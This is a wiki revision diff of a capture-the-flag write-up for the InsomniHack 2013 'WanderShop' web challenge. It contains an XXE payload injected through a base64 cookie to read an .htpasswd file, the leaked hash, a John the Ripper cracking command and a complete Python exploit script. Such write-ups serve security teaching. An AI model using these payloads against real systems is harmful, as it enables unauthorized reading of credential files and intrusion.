Difference between revisions of "InsomniHack-2013/Web2/WanderShop"

Revision as of 14:05, 26 March 2013

Summary

If we are to survive this world, we are going to need some weapons. This shady merchant seems to be selling some interesting stuff. Unfortunately, we have absolutely no cash for this.
Could you break into his shop and get us as many items as you can?
Goal : Access the admin page

Solution

The admin page is protected with http auth on /admin
The shop items are saved in a cookie. Which decodes to an xml description of the basket, base64 and url encoded.

In [11]: a='PD94bWwgdmVyc2lvbj0iMS4wIj8%2BCjxiYXNrZXQ%2BCiAgICA8aXRlbSB0eXBlPSI1IiBuYW1lPSJT%0Ad29yZCI%2BNTwvaXRlbT4KICAgIDxpdGVtIHR5cGU9IjQiIG5hbWU9IktuaWZlIj40PC9pdGVtPgo8%0AL2Jhc2tldD4KCg%3D%3D'

In [12]: print base64.decodestring(urllib2.unquote(a))
<?xml version="1.0"?>
<basket>
    <item type="5" name="Sword">5</item>
    <item type="4" name="Knife">4</item>
</basket>

We can then inject XML with the cookie, we use XML external entities which allow to manipulate local files and display the result in the XML

<!DOCTYPE basket
[
<!ENTITY item SYSTEM "admin/.htpasswd">
]>
<basket>
    <item type="5" name="asd">&item;</item>
</basket>

The result of the XML is parsed and displayed in the paying page, so we put the content of the .htpasswd file in an item element which will be displayed in the table.
Here's the HTML result

<!DOCTYPE html>
<html lang="en">
<head>
<title>Wander Shop</title>
<link rel="StyleSheet" href="css/bootstrap.min.css" type="text/css"/>
<script src="js/bootstrap.min.js"></script>
</head>
<body>
<div class="container">
    <h1>Wander Shop</h1>
    Verify your cart:<table class='table table-condensed'><tr><td>admin:sQcHhNWX6v1VM
    </td><td>x</td><td>asd</td></tr></table>
    <form action="pay.php">
    <input type="submit" value="Pay"/>
    </form>
    </div>
    </body>
    </html>

The password is in CRYPT format, which is easily bruteforced with john the ripper

echo 'admin:sQcHhNWX6v1VM' > /tmp/pass
john /tmp/pass
>slamas           (admin)

The flag is in the admin page

Complete script

#!/usr/bin/env python
 
import requests, urllib2, base64
 
url = 'http://web02.insomni.hack/1a5b4e6f811a0bc0dcb8fdd773bdb51c571be4e6/'
payload='''
<!DOCTYPE basket
[
<!ENTITY item SYSTEM "admin/.htpasswd">
]>
<basket>
    <item type="5" name="asd">&item;</item>
</basket>
'''
 
payload = urllib2.quote(base64.encodestring(payload))
 
cookie = {'basket': payload}
r = requests.get(url + 'checkout.php', cookies=cookie)
print r.content

@@ Line 18: / Line 18: @@
 </pre>
 * We can then inject XML with the cookie, we use [https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing XML external entities] which allow to manipulate local files and display the result in the XML
-<pre>
+<syntaxhighlight lang="xml">
 <!DOCTYPE basket
 [
@@ Line 26: / Line 26: @@
      <item type="5" name="asd">&item;</item>
 </basket>
-</pre>
+</syntaxhighlight>
 * The result of the XML is parsed and displayed in the paying page, so we put the content of the .htpasswd file in an item element which will be displayed in the table.
 * Here's the HTML result
-<pre>
+<syntaxhighlight lang="html4strict">
 <!DOCTYPE html>
 <html lang="en">
@@ Line 48: / Line 48: @@
      </body>
      </html>
-</pre>
+</syntaxhighlight>
 * The password is in CRYPT format, which is easily bruteforced with john the ripper
   echo 'admin:sQcHhNWX6v1VM' > /tmp/pass
@@ Line 56: / Line 56: @@
 * Complete script
-<pre>
+<syntaxhighlight lang="python">
 #!/usr/bin/env python
@@ Line 77: / Line 77: @@
 r = requests.get(url + 'checkout.php', cookies=cookie)
 print r.content
-</pre>
+</syntaxhighlight>
 == See also ==
 * [[InsomniHack-2013]]

Difference between revisions of "InsomniHack-2013/Web2/WanderShop"

Revision as of 14:05, 26 March 2013

Summary

Solution

See also

Navigation menu

Personal tools

Namespaces

Variants

Views

More

Search

Navigation

Tools